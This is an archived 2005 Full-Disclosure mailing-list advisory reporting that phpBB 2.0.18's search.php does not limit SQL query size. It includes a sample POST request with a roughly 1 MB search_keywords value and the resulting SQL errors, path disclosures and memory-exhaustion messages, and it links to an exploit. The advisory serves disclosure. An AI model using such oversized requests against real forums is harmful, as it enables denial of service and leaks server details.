| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Wed, 12 Oct 2005 18:05:50 +0200 From: Maksymilian Arciemowicz <max@...tsuper.pl> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: phpBB 2.0.18 SQL Query problem -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [phpBB 2.0.18 SQL Query problem cXIb8O3.19] Author: Maksymilian Arciemowicz (cXIb8O3) Date: 11.11.2005 from securityreason.com TEAM - --- 0.Description --- phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin boar d package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL , MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community so lution for all web sites. Contact with author http://www.phpbb.com/about.php. - --- 1. * SQL query problem --- phpBB2 don't check size of sql query. So we can send any data in all post variables. Standart Environment: post_max_size=8M (standart) max_allowed_packet < 7M (1M standart in mysql) Example Evironment: memory_limit>8MB max_execution_time=30 max_allowed_packet=1M I have written simple request where one variable POST to sql query was 1M. - ---request--- POST /2018/phpBB2/search.php HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded Content-Length: strlen(x) mode=results&search_keywords=SecurityReasonComSecurityRea...xMB>max_allowed_packet. (example.1MB.data)...sonCom - ---/request--- so in output: - ---output1--- Could not obtain matched posts list DEBUG MODE SQL Error : 1153 Got a packet bigger than 'max_allowed_packet' SELECT m.post_id FROM phpbb_search_wordlist w, phpbb_search_wordmatch m WHERE w.word_text LIKE 'securityreasoncomsecurityreasoncom...' AND m.word_id = w.word_id AND w.word_common <> 1 AND m.title_match = 0 Line : 321 File : search.php - ---/output1--- sql error. or when you have: memory_limit=8MB or max_execution_time<30 display_error=1 You can see in output example: - ---output2--- Fatal error: Maximum execution time of 15 seconds exceeded in /www/2018/phpBB2/includes/functions_search.php on line 72 - ---/output2--- - ---output3--- Fatal error: Allowed memory size of 8388608 bytes exhausted (tried to allocate 1746401 bytes) in /www/2018/phpBB2/includes/functions_search.php on line 27 - ---/output3--- Exploit: http://securityreason.com/achievement_exploitalert/4 (simple errors) - --- 2. Greets --- sp3x - --- 3.Contact --- Author: Maksymilian Arciemowicz < cXIb8O3 > Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg securityreason.com TEAM -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.2 (FreeBSD) iD8DBQFDTTO43Ke13X/fTO4RAuUsAJ9Ry6GqbPsb1wSxvqU37cp87UHpTgCeIwdy k1NCDNaYsDg1ofLsZFJDMAw= =dp0t -----END PGP SIGNATURE----- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists